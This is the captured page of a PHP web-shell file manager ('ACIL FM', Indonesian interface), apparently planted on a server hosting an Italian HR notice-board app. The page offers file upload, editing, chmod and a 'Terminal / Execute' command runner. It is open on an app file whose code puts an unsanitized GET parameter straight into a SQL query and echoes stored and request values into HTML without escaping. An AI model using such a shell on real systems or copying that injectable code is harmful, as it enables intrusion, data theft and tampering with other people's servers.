ACIL FM
Dark
Refresh
Current DIR:
/home/mhhtmff/app/NH-HR-test-old/ds/public/bacheca
/
home
mhhtmff
app
NH-HR-test-old
ds
public
bacheca
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
bacheca_details.php
4.57 MB
chmod
View
DL
Edit
Rename
Delete
bacheca_list.php
3.76 MB
chmod
View
DL
Edit
Rename
Delete
edit_bacheca_content.php
1.61 MB
chmod
View
DL
Edit
Rename
Delete
info_bacheca_content.php
3.48 MB
chmod
View
DL
Edit
Rename
Delete
new_bacheca_content.php
1.52 MB
chmod
View
DL
Edit
Rename
Delete
Edit file: /home/mhhtmff/app/NH-HR-test-old/ds/public/bacheca/edit_bacheca_content.php
<?php session_start(); if (!isset($_SESSION['loggedin'])) { exit("unauthorized"); } include "../../php/database.php"; $bacheca_id = $_GET["bacheca_id"]; $sql = "SELECT * FROM bacheca WHERE id = $bacheca_id"; $result = mysqli_query($con, $sql); $bacheca = mysqli_fetch_assoc($result); $body_with_br = $bacheca["body"]; $body = str_ireplace("<br>", "\n", $body_with_br); ?> <div class="modal-header"> <h5 class="modal-title" id="exampleModalLabel">Modifica pubblicazione</h5> <button class="close" type="button" data-dismiss="modal" aria-label="Close"><span aria-hidden="true" id="close_edit_bacheca">×</span></button> </div> <div class="modal-body"> <form> <div class="form-group row"> <label class="col-sm-3 col-form-label" for="inputEmail3">Oggetto</label> <div class="col-sm-9"> <input class="form-control" id="new_bacheca_object" type="text" placeholder="Oggetto" value="<?php echo $bacheca["object"]; ?>"> </div> </div> <div class="form-group row"> <label class="col-sm-3 col-form-label" for="inputEmail3">Corpo</label> <div class="col-sm-9"> <textarea class="form-control" id="new_bacheca_body" placeholder="Corpo" rows="20"><?php echo $body; ?></textarea> </div> </div> </form> </div> <div class="modal-footer"> <button class="btn btn-secondary" type="button" data-dismiss="modal">Chiudi</button> <button class='btn btn-primary ml-2' type='button' onclick='UpdateBacheca(<?php echo $bacheca_id; ?>)'>Aggiorna</button> </div>
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply